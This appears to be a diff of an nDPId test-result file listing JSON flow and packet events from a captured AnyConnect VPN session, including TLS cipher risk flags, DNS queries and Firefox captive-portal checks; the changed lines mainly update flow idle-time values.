-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1569687267077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267077,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95hAbsGNnxNzhMA9oAQ\/\/\/yvgAAAQEIChwNzpw\/+a5O"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687267035,"flow_last_seen":1569687267079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569687267079,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01205{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267035,"flow_last_seen":1569687267125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1569687267125,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01592{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687267035,"flow_last_seen":1569687267203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5944,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1569687267203,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3eiXsRe4AREAA75QAAAQEIChwN0AsAIb2q"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAjsAAAAQEIChwN0AsGksZO"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1569687267454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267454,"pkt":"NDY7z3UopHczjPFACABFAAA0sX1AAEAGc88KAACVCgAA4x9I3iGJexF7JTyt34ARAPMpJgAAAQEICgAh33UcDdAL"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1569687267455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267455,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3fiXsRfIAQEAAaFwAAAQEIChwN0A0AId91"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687262866,"flow_last_seen":1569687262866,"flow_idle_time":7560000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1569687262866,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1569687262866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBvT9S8yS4AYEAD8CwAAAQEIChwNvkTkAuRNDi2ISqeLxJuBXTMcrWivnw=="} +00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1569687262866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAAEWAABAAEAGYIgKAADjot4rmd4xAbu3QBvj9S8yS4AYEACf4gAAAQEIChwNvkTkAuRNC2FzYPnyOhEIxzv9HgAAAQAAAAAABf0HAAAAAAAAAFYAAAAAABO4pgAAAfJ1AAAAGzdZOcQAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAAEjynVwAAAAAACz6PAAAAAABmQ+JAyo3EgU6LQwAAAAAAAAAAAAAACK7duMsBAQAAAAELYXNg+fI6EQjHO\/0eAAABAAAAAAAF\/QcAAAAAAAAAVgAAAAAAE7imAAAB8nUAAAAbN1k5xAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAASPKdXAAAAAAALPo8AAAAAAAAAAQ=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1569687262866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBzF9S8yS4AYEABLrAAAAQEIChwNvkTkAuRNchVP5mraMf5Tgny7zRbHZQ=="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267035,"flow_last_seen":1569687267035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687267035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1569687267035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687267035,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95hAbsGNnxMAAAAALAC\/\/9wfAAAAgQFtAEDAwUBAQgKHA3OcQAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1569687267077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687267077,"pkt":"NDY7z3UoLH6BsEqhCABFAAA47VEAAPcGXQsIJWZbCgAA4wG73mHOEwD1BjZ8TZASgABbLAAAAgQFtAEBCAo\/+a5OHA3OcQ=="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1569687267077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267077,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95hAbsGNnxNzhMA9oAQ\/\/\/yvgAAAQEIChwNzpw\/+a5O"} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687267035,"flow_last_seen":1569687267079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569687267079,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01205{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267035,"flow_last_seen":1569687267125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1569687267125,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01592{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687267035,"flow_last_seen":1569687267203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5944,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1569687267203,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56865,"dst_port":8008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3eiXsRe4AREAA75QAAAQEIChwN0AsAIb2q"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267453,"flow_last_seen":1569687267453,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267453,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56866,"dst_port":8060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1569687267453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267453,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAjsAAAAQEIChwN0AsGksZO"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1569687267454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267454,"pkt":"NDY7z3UopHczjPFACABFAAA0sX1AAEAGc88KAACVCgAA4x9I3iGJexF7JTyt34ARAPMpJgAAAQEICgAh33UcDdAL"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1569687267455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267455,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld4hH0glPK3fiXsRfIAQEAAaFwAAAQEIChwN0A0AId91"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1569687267477,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1569687267477,"pkt":"LH6BsEqhNDY7z3UoCABFAAA5Pw0AAP8R2y0KAADjS0tLS9+lADUAJfklv50BAAABAAAAAAAAB21vemlsbGEDb3JnAAABAAE="} 00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267477,"flow_last_seen":1569687267477,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1569687267477,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mozilla.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1569687267481,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1569687267481,"pkt":"LH6BsEqhNDY7z3UoCABFAABG89oAAP8RJlMKAADjS0tLS\/PbADUAMlit7RYBAAABAAAAAAAADGRldGVjdHBvcnRhbAdmaXJlZm94A2NvbQAAAQAB"} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267481,"flow_last_seen":1569687267481,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1569687267481,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"detectportal.firefox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":61,"midstream":1,"thread_ts_msec":1569687267482,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt?ipv4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} -00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1569687267483,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":61,"midstream":1,"thread_ts_msec":1569687267482,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt?ipv4","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} +00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687249612,"flow_last_seen":1569687267483,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1569687267483,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"detectportal.firefox.com","url":"detectportal.firefox.com\/success.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko\/20100101 Firefox\/69.0"}} 